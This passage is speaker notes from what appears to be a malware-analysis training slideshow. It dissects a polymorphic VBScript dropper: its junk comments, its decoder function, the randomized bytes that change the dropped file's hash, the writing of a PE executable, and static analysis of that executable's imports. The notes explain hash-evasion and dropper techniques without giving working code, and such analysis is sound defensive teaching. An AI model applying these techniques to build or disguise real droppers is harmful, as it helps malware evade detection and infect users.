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4cfb0330c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4cfb0330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key point here is that if the value "999999" occurs in the array that is passed into the function, the function returns a randomized integer value between 2 and 9.</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remember Rnd means a value:  </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>less than 1</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>greater than or equal to 0</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>So our possible range of values:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>if Rnd = 0, we get 9</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>if Rnd = 0.9999999, we get 2.0000007, which becomes 2 due to Int()</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>so our range of values is from 2 to 9</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4cfb0330c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4cfb0330c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999999 only occurs in this one array throughout the entire VBS file (other than the IF statement).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snipped the output there because later we will want to know the values before and after the 999999 values.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6a6730fe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6a6730fe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https://www.w3schools.com/asp/func_int.asp   ← Int() doesn't round, it just returns the integer portion of the value.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4cfb033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4cfb033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4cfb0330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4cfb0330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code consists of 693 lines, some of them very very long, here is a glimpse of what we see at the very beginning of the file.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Yellow, we see the single quote -- the single quote is a comment</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>In Green, we see "REM" -- another way of denoting a comment</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>In Blue, we see an assignment -- where we are assigning an array of values to a variable named "rUM"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know the comment lines do nothing, we can just get rid of them…</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>But why put them in at all?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4cfb0330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4cfb0330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chemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>I wanted to take a screenshot of the whole VBS in a text editor with highlighting for the comments, but that turned out to not be feasible -- copy/paste into Google Docs resulted in a 476 page document.</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4cfb0330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4cfb0330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hmm.. almost every line is an assignment, but we see an "execute" line.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>I wonder how much of the code is just assignments?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grep -E '= Array|=Array' dropper1.vbs | wc -l</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>556</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4cfb0330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4cfb0330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4cfb0330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4cfb0330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4cfb0330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4cfb0330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hmm… limpet() in every line, until we hit "Function limpet()"</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>I snipped out the rest of function limpet() because we will see that soon, I wanted to show the rest of the code.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>To not theat after all of the "execute(limpet()", we have a bunch of commands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a14017d3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a14017d3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4cfb0330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4cfb0330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hmm… why is there just one function?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Actually there are a lot of functions -- remember all those lines at the end that were just one word?  Those are all functions.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>So why is limpet() on it's own like that?  </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Turns out limpet() is the decoder function, it needs to be in plain text because it can't </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>decode itself.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Yellow is just denoting that limpet is a function</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Green is our key things to creating the polymorphism</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Blue is the thing that triggers the polymorphism</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4cfb0330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4cfb0330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chivalrous is set to the value 1;</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>pbl is set to the value 9;</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KONQLa … what does "lbound()" do?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>https://www.w3schools.com/asp/func_lbound.asp</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>The LBound function returns the smallest subscript for the indicated dimension of an array.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Meaning KONQLa gets the address of the first element in the array… the start of the array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https://www.w3schools.com/asp/func_ubound.asp</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>The UBound function returns the largest subscript for the indicated dimension of an array.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>OOSUF gets the address of the last element in the array… the end of the array</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04cfb0330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04cfb0330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skip the If..Then for now, just look at the for loop,</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>We have a loop from the start of the array to the end of the array and we do this "Randomize" thing…</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://docs.microsoft.com/en-us/office/vba/language/reference/user-interface-help/rnd-function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Randomize is used with the Rnd function.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>By default Rnd returns a number less than 1 but greater or equal to 0, but would return the same number every time…</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Unless you specify Randomize -- with Randomize you will get a different value each time Rnd is run.</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6a6730fe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06a6730fe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saw this slide before in the beginning.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>The key point here is that if the value "999999" occurs in the array that is passed into the function, the function returns a randomized integer value between 2 and 9.</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remember Rnd means a value:  </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>less than 1</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>greater than or equal to 0</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>So our possible range of values:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>if Rnd = 0, we get 9</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>if Rnd = 0.9999999, we get 2.0000007, which becomes 2 due to Int()</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>so our range of values is from 2 to 9</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4cfb0330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4cfb0330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Else clause is the "normal" case -- how to decode the regular content. (Rather than the polymorphic content.)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4cfb0330c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4cfb0330c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do have a lot of "7" values and note nothing much larger than 255, so we can pretty much guess that we are dealing with ascii values like you'd find on asciitable.com</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4cfb0330c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04cfb0330c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4cfb0330c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4cfb0330c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4cfb0330c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4cfb0330c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04cfb0330c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04cfb0330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4cfb0330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4cfb0330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That's not exactly what we have here in this sample today.</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04cfb0330c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04cfb0330c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04cfb0330c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04cfb0330c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Sorry, I know that's too small to read, but we can see the single quotes and REM lines.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Let's get rid of those, then take another look.</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04cfb0330c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04cfb0330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key things here are highlighted in Yellow.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>We create an ADODB.Stream object</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Do some stuff, then ".SaveToFile"</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>The Green stuff is interesting too… the ThreatActors appear to have included debug logging in their code.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>I guess "F_DROPPED" means "file dropped"</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04cfb0330c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04cfb0330c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310f699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0310f699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 first element is just one of the arrays… How much do you want to bet that those first 2 characters are "MZ"?</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0310f6999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0310f6999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happened here?  I'm guessing wscript printed what it could, "MZ", but then ran into many unprintable characters, so it gave up after "MZ".</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>But "MZ" is a great sign for us right?  Means we are writing a PE (Portable Executable) file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included this slide because I want you to know that there are a lot of "failures" along the way.</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0310f6999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0310f6999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310f6999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0310f6999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do find the file hash on virustotal:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>https://www.virustotal.com/gui/file/77e706f98b1e4fe48a4a1631b27529dc587aeab2d187322439d3b5a726da2f80</a:t>
            </a:r>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0310f6999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0310f6999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what I mean by "polymorphic feature" of the dropper – it generates a dropped file with a different file hash each time, but the dropped file is functionally the same</a:t>
            </a:r>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0310f6999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0310f6999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Searching VirusTotal for that Imphash returned 0 hits – which is weird, since we are looking at 1 sample right now.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>But that's ok, we can search elsewhere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4cfb0330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4cfb0330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hashes are the result of running the dropper function 4 times.</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0310f6999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0310f6999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MalwareBazaar has 26 hits, all received between 2021-06-02 to 2021-06-03.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>That top sample that starts with 77e7… is the hash of the file that VirusTotal knows (our first sample).</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0310f6999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0310f6999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deeper explanation of how an imphash is calculated, check out this article:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>https://malcomvetter.medium.com/defeating-imphash-fb7cf0183ac</a:t>
            </a:r>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0310f6999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0310f6999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Say you are the ThreatActor, and you need to find a way to write a file to disk.</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Are you going to write the code to manipulate the file system?</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Or do you want to just use the functions Microsoft provides through API calls?</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Using the functions Microsoft provides is the action of "importing" those functions.</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>So rather than writing code to store bytes to disk, you can just call the "WriteFile" function from kernel32.dll</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This article is pretty fantastic at explaining how we can use these imports to kind of guess the functionality of a PE file:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://medium.com/mrx-007/basic-static-analysis-of-malware-and-common-dll-ef9455d49968</a:t>
            </a:r>
            <a:endParaRPr sz="1200">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0310f6999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0310f6999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it imports a lot of stuff, 108 functions identified by PEStudio.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Note that PEStudio identified ws2_32.dll as dangerous – thus the red lettering</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0310f6999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0310f6999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an example of how to use connect from Microsoft:  </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>https://docs.microsoft.com/en-us/windows/win32/api/Winsock2/nf-winsock2-connect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doc explains more about the ws2_32.dll functions:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>https://docs.microsoft.com/en-us/windows/win32/winsock/winsock-functions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really fantastic article on "Basic Static Analysis":  https://nasbench.medium.com/malware-analysis-techniques-basic-static-analysis-335a7286a176</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probably a poor example of the connect() function because it looks quite complex.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>The point is the connect() function creates a network connection</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0310f6999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0310f6999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info on LoadLibraryExW:  (in summary, LoadLibraryExW is used to load up and run a DLL)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibraryexw</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Example of LoadLibraryExW used in malware:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>https://www.avira.com/en/blog/coinloader-a-sophisticated-malware-loader-campaign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0310f69995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0310f6999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06a6730fe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06a6730fe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see the 4 random values occur at the same location in each file.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>We see that each value is between 2 and 9 – but we don't actually see any 9 values – remember "the maths" slide, a 9 is going to be exceedingly rare (1 in 10 million)</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06a6730fe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06a6730fe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06a6730fe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06a6730fe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310f6999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310f6999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was actually expecting to not find the hash due to the polymorphic feature</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06a6730fe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06a6730fe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Red, we see a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>weird</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> condition for our IF statement – </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>	If the script name contains "82984", then we pop up a message box</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>	Else we run 2 more functions and quit.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Turns out the Threat Actors built in some testing – when they are testing the script, they name it something like "sample82984.vbs".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we want to find out what DIAMe() and nimbus do</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06a6730fe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06a6730fe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DlAMe() does an HTTP GET request… hmm but to where?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
